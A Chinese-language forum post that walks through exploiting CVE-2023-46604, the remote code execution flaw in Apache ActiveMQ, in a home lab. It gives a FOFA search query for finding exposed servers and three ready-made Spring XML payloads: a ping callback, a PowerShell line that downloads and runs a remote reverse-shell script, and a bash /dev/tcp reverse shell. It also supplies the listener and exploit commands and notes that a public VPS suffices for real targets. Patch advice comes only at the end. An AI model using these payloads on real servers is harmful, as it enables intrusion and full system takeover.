【Apache ActiveMQ 远程代码实行漏洞复现(CVE-2023-46604)】

打印 上一主题 下一主题

主题 1509|帖子 1509|积分 4527

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
文章目次
  前言
  一、漏洞名称
  二、漏洞形貌
  三、受影响端口
  四、受影响版本
  五、FOFA语法
  六、本地复现
  1、环境搭建
  2、exp工具复现
  七、修复发起
  
前言

近期在漏洞扫描时发现服务器存在CVE-2023-46604漏洞,故做一下漏洞复现记载。

一、漏洞名称

Apache ActiveMQ 远程代码实行漏洞
二、漏洞形貌

Apache ActiveMQ 中存在远程代码实行漏洞,具有 Apache ActiveMQ 服务器TCP端口(默以为61616)访问权限的远程攻击者可以通过发送恶意数据到服务器从而实行恣意代码。
三、受影响端口

61616
四、受影响版本

Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16
五、FOFA语法

  1. app="APACHE-ActiveMQ" && port="61616"
复制代码
六、本地复现

1、环境搭建

本地环境采用的是kali+win10体系做复现,漏洞环境安装摆设在win10中。
ActiveMQ版本:5.17.4,Java环境为jdk11,需提前安装好。
win10 IP:192.168.78.174
kali IP: 192.168.78.128
下载好ActiveMQ后修改配置文件

进入bin目次下选择win64目次下的bat文件开启运行
可访问即可,默认账户暗码:admin/admin

2、exp工具复现

工具地址:
https://github.com/sincere9/Apache-ActiveMQ-RCE/tree/main/exp
https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
个人感觉下面这个好用点,我这里用下面这个吧
上面这个工具使用可参考这个博客:Apache ActiveMQ 远程代码实行漏洞复现(CNVD-2023-69477)-CSDN博客
工具下载好后利用很简朴,首先准备好poc.xml
poc-dnslog
  1. <?xml version="1.0" encoding="utf-8"?>
  2. <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  
  3.   <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  4.     <constructor-arg>
  5.       <list>
  6.         <value>ping</value>   
  7.         <value>xxx.xxx.xxx.cn</value>
  8.       </list>
  9.     </constructor-arg>
  10.   </bean>
  11. </beans>
复制代码
poc-win
  1. <beans xmlns="http://www.springframework.org/schema/beans"
  2.        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  3.        xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  4.     <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  5.         <constructor-arg>
  6.             <list>
  7.                 <value>powershell</value>
  8.                 <value>-c</value>
  9.                 <value><![CDATA[IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.78.128 -Port 3333]]></value>
  10.             </list>
  11.         </constructor-arg>
  12.     </bean>
  13. </beans>
复制代码
poc-linux
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2.     <beans xmlns="http://www.springframework.org/schema/beans"
  3.        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4.        xsi:schemaLocation="
  5.      http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  6.         <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  7.             <constructor-arg >
  8.             <list>
  9.                 <value>bash</value>
  10.                 <value>-c</value>
  11.                 <value><![CDATA[bash -i >& /dev/tcp/ip/端口 0>&1]]></value>
  12.             </list>
  13.             </constructor-arg>
  14.         </bean>
  15.     </beans>
复制代码
这里目标主机为windows体系,采用对应的poc,固然poc是根据环境决定,可随意改
在poc目次开启http服务,可正常访问即可
  1. python3 -m http.server 8000
复制代码

在kali监听端口
  1. nc -lvvp 3333
复制代码
在本机运行exp工具
  1. activemq-rce -i 192.168.78.174 -u http://192.168.78.128:8000/poc.xml
复制代码

检察监听端口,可看到shell乐成反弹,而且为管理员权限

复现乐成
实际环境反弹须借助vps公网IP,操作方法类似,做好端口映射,发布http服务即可。
注:无授权不要随意使用实际环境复现,最好是本地,本文仅作技能交流,任何非授权行为均与本文无关。
七、修复发起

发起更新到安全版本
  1. Apache ActiveMQ >= 5.18.3
  2. Apache ActiveMQ >= 5.17.6
  3. Apache ActiveMQ >= 5.16.7
  4. Apache ActiveMQ >= 5.15.16
复制代码


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

八卦阵

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表